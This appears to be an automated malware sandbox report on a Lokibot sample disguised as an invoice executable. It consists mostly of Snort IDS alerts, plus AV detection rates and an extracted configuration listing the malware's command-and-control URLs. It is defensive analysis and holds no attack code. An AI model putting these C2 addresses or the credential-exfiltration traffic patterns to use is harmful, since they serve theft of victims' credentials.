            Timestamp:192.168.2.395.213.216.20249705802025381 11/30/22-00:54:20.168790
            SID:2025381
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497332025483 11/30/22-00:55:15.751744
            SID:2025483
            Source Port:80
            Destination Port:49733
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249745802825766 11/30/22-00:55:36.377571
            SID:2825766
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497032025483 11/30/22-00:54:18.541620
            SID:2025483
            Source Port:80
            Destination Port:49703
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497142025483 11/30/22-00:54:41.602416
            SID:2025483
            Source Port:80
            Destination Port:49714
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249716802024313 11/30/22-00:54:43.829219
            SID:2024313
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.859433532014169 11/30/22-00:54:56.376062
            SID:2014169
            Source Port:59433
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249757802024313 11/30/22-00:55:58.948901
            SID:2024313
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249717802825766 11/30/22-00:54:45.540558
            SID:2825766
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249722802024313 11/30/22-00:54:54.732179
            SID:2024313
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249716802024318 11/30/22-00:54:43.829219
            SID:2024318
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249759802025381 11/30/22-00:56:01.042444
            SID:2025381
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249757802024318 11/30/22-00:55:58.948901
            SID:2024318
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249723802825766 11/30/22-00:54:56.463103
            SID:2825766
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249718802025381 11/30/22-00:54:47.592007
            SID:2025381
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249730802025381 11/30/22-00:55:08.823725
            SID:2025381
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249704802021641 11/30/22-00:54:18.966132
            SID:2021641
            Source Port:49704
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249722802024318 11/30/22-00:54:54.732179
            SID:2024318
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249745802021641 11/30/22-00:55:36.377571
            SID:2021641
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249714802024313 11/30/22-00:54:39.977728
            SID:2024313
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249725802825766 11/30/22-00:54:59.930841
            SID:2825766
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249700802025381 11/30/22-00:54:09.487691
            SID:2025381
            Source Port:49700
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249714802024318 11/30/22-00:54:39.977728
            SID:2024318
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.858708532014169 11/30/22-00:55:15.985743
            SID:2014169
            Source Port:58708
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:95.213.216.202192.168.2.380497282025483 11/30/22-00:55:06.759571
            SID:2025483
            Source Port:80
            Destination Port:49728
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249732802024318 11/30/22-00:55:12.457821
            SID:2024318
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249707802825766 11/30/22-00:54:24.716724
            SID:2825766
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497242025483 11/30/22-00:54:59.594972
            SID:2025483
            Source Port:80
            Destination Port:49724
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249732802024313 11/30/22-00:55:12.457821
            SID:2024313
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249708802021641 11/30/22-00:54:26.803652
            SID:2021641
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249724802024318 11/30/22-00:54:58.184483
            SID:2024318
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249759802021641 11/30/22-00:56:01.042444
            SID:2021641
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249751802025381 11/30/22-00:55:47.279515
            SID:2025381
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249724802024313 11/30/22-00:54:58.184483
            SID:2024313
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249710802025381 11/30/22-00:54:31.910937
            SID:2025381
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249715802825766 11/30/22-00:54:42.060768
            SID:2825766
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249747802024318 11/30/22-00:55:40.214633
            SID:2024318
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249747802024313 11/30/22-00:55:40.214633
            SID:2024313
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249719802024313 11/30/22-00:54:49.641508
            SID:2024313
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249743802825766 11/30/22-00:55:32.962709
            SID:2825766
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.857571532014169 11/30/22-00:54:51.528645
            SID:2014169
            Source Port:57571
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249719802024318 11/30/22-00:54:49.641508
            SID:2024318
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249742802024318 11/30/22-00:55:31.101064
            SID:2024318
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.859636532014169 11/30/22-00:54:37.879679
            SID:2014169
            Source Port:59636
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249720802825766 11/30/22-00:54:51.608521
            SID:2825766
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249742802024313 11/30/22-00:55:31.101064
            SID:2024313
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249718802021641 11/30/22-00:54:47.592007
            SID:2021641
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249733802025381 11/30/22-00:55:14.244291
            SID:2025381
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249736802021641 11/30/22-00:55:19.643476
            SID:2021641
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249746802021641 11/30/22-00:55:38.275174
            SID:2021641
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249734802024318 11/30/22-00:55:16.065951
            SID:2024318
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249723802025381 11/30/22-00:54:56.463103
            SID:2025381
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249748802825766 11/30/22-00:55:42.098367
            SID:2825766
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249737802024313 11/30/22-00:55:21.614296
            SID:2024313
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497562025483 11/30/22-00:55:58.723099
            SID:2025483
            Source Port:80
            Destination Port:49756
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249702802825766 11/30/22-00:54:14.871390
            SID:2825766
            Source Port:49702
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249737802024318 11/30/22-00:55:21.614296
            SID:2024318
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249730802825766 11/30/22-00:55:08.823725
            SID:2825766
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249706802024313 11/30/22-00:54:22.484255
            SID:2024313
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249734802024313 11/30/22-00:55:16.065951
            SID:2024313
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497352025483 11/30/22-00:55:19.347023
            SID:2025483
            Source Port:80
            Destination Port:49735
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249706802024318 11/30/22-00:54:22.484255
            SID:2024318
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497522025483 11/30/22-00:55:50.930381
            SID:2025483
            Source Port:80
            Destination Port:49752
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497172025483 11/30/22-00:54:47.032787
            SID:2025483
            Source Port:80
            Destination Port:49717
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249733802825766 11/30/22-00:55:14.244291
            SID:2825766
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497392025483 11/30/22-00:55:26.908255
            SID:2025483
            Source Port:80
            Destination Port:49739
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249720802025381 11/30/22-00:54:51.608521
            SID:2025381
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249749802021641 11/30/22-00:55:43.976237
            SID:2021641
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.865320532014169 11/30/22-00:54:43.751689
            SID:2014169
            Source Port:65320
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249735802825766 11/30/22-00:55:17.863854
            SID:2825766
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.852079532014169 11/30/22-00:55:32.870195
            SID:2014169
            Source Port:52079
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:95.213.216.202192.168.2.380497012025483 11/30/22-00:54:14.085146
            SID:2025483
            Source Port:80
            Destination Port:49701
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249731802025381 11/30/22-00:55:10.632751
            SID:2025381
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249709802024318 11/30/22-00:54:29.164231
            SID:2024318
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249745802024318 11/30/22-00:55:36.377571
            SID:2024318
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249709802024313 11/30/22-00:54:29.164231
            SID:2024313
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249705802825766 11/30/22-00:54:20.168790
            SID:2825766
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249745802024313 11/30/22-00:55:36.377571
            SID:2024313
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249704802024318 11/30/22-00:54:18.966132
            SID:2024318
            Source Port:49704
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249704802024313 11/30/22-00:54:18.966132
            SID:2024313
            Source Port:49704
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249717802024313 11/30/22-00:54:45.540558
            SID:2024313
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249722802825766 11/30/22-00:54:54.732179
            SID:2825766
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249703802025381 11/30/22-00:54:16.960834
            SID:2025381
            Source Port:49703
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.849302532014169 11/30/22-00:54:20.078245
            SID:2014169
            Source Port:49302
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249711802024313 11/30/22-00:54:33.859062
            SID:2024313
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249728802825766 11/30/22-00:55:05.285201
            SID:2825766
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249705802021641 11/30/22-00:54:20.168790
            SID:2021641
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249711802024318 11/30/22-00:54:33.859062
            SID:2024318
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249738802021641 11/30/22-00:55:23.450513
            SID:2021641
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.865385532014169 11/30/22-00:55:49.289719
            SID:2014169
            Source Port:65385
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249740802825766 11/30/22-00:55:27.193434
            SID:2825766
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497452025483 11/30/22-00:55:37.973570
            SID:2025483
            Source Port:80
            Destination Port:49745
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497462025483 11/30/22-00:55:39.906968
            SID:2025483
            Source Port:80
            Destination Port:49746
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497402025483 11/30/22-00:55:28.902821
            SID:2025483
            Source Port:80
            Destination Port:49740
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249717802024318 11/30/22-00:54:45.540558
            SID:2024318
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249701802024313 11/30/22-00:54:12.581436
            SID:2024313
            Source Port:49701
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249738802825766 11/30/22-00:55:23.450513
            SID:2825766
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497132025483 11/30/22-00:54:39.587400
            SID:2025483
            Source Port:80
            Destination Port:49713
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249701802024318 11/30/22-00:54:12.581436
            SID:2024318
            Source Port:49701
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249756802825766 11/30/22-00:55:57.533680
            SID:2825766
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497022025483 11/30/22-00:54:16.469088
            SID:2025483
            Source Port:80
            Destination Port:49702
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249750802825766 11/30/22-00:55:45.758418
            SID:2825766
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249743802021641 11/30/22-00:55:32.962709
            SID:2021641
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249740802021641 11/30/22-00:55:27.193434
            SID:2021641
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249729802025381 11/30/22-00:55:07.068054
            SID:2025381
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249752802024313 11/30/22-00:55:49.378987
            SID:2024313
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249741802025381 11/30/22-00:55:29.247109
            SID:2025381
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249726802025381 11/30/22-00:55:01.673863
            SID:2025381
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249752802024318 11/30/22-00:55:49.378987
            SID:2024318
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.856042532014169 11/30/22-00:54:35.894646
            SID:2014169
            Source Port:56042
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.853844532014169 11/30/22-00:55:03.396283
            SID:2014169
            Source Port:53844
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.38.8.8.862050532014169 11/30/22-00:54:33.763792
            SID:2014169
            Source Port:62050
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249728802021641 11/30/22-00:55:05.285201
            SID:2021641
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497512025483 11/30/22-00:55:49.068855
            SID:2025483
            Source Port:80
            Destination Port:49751
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249755802024318 11/30/22-00:55:55.653974
            SID:2024318
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:95.213.216.202192.168.2.380497182025483 11/30/22-00:54:49.052316
            SID:2025483
            Source Port:80
            Destination Port:49718
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.852547532014169 11/30/22-00:55:01.596754
            SID:2014169
            Source Port:52547
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249755802024313 11/30/22-00:55:55.653974
            SID:2024313
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249727802024318 11/30/22-00:55:03.486766
            SID:2024318
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249713802025381 11/30/22-00:54:37.979213
            SID:2025381
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249756802021641 11/30/22-00:55:57.533680
            SID:2021641
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.865459532014169 11/30/22-00:55:47.178193
            SID:2014169
            Source Port:65459
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:95.213.216.202192.168.2.380497072025483 11/30/22-00:54:26.372322
            SID:2025483
            Source Port:80
            Destination Port:49707
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249715802021641 11/30/22-00:54:42.060768
            SID:2021641
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249712802825766 11/30/22-00:54:35.972913
            SID:2825766
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249753802825766 11/30/22-00:55:51.242717
            SID:2825766
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.38.8.8.854153532014169 11/30/22-00:55:51.152832
            SID:2014169
            Source Port:54153
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic
            Timestamp:192.168.2.395.213.216.20249754802025381 11/30/22-00:55:53.496270
            SID:2025381
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.395.213.216.20249727802024313 11/30/22-00:55:03.486766
            SID:2024313
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: INV.2022LB0362 FORM CO (2).exeReversingLabs: Detection: 70%
            Source: INV.2022LB0362 FORM CO (2).exeVirustotal: Detection: 56%Perma Link
            Source: http://sempersim.su/gm11/fre.phpAvira URL Cloud: Label: malware
            Source: sempersim.suVirustotal: Detection: 25%Perma Link
            Source: http://sempersim.su/gm11/fre.phpVirustotal: Detection: 25%Perma Link
            Source: INV.2022LB0362 FORM CO (2).exeJoe Sandbox ML: detected
            Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sempersim.su/gm11/fre.php"]}
            Source: INV.2022LB0362 FORM CO (2).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: INV.2022LB0362 FORM CO (2).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:49977 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49699 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49699 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49699 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49699 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49699 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:57840 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49700 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49700 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49700 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49700 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49700 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:57990 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49701 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49701 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49701 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49701 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49701 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49701
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:52387 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49702 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49702 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49702 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49702 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49702 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49702
            Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:56924 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49703 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49703 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49703 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49703 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49703 -> 95.213.216.202:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.3:49703
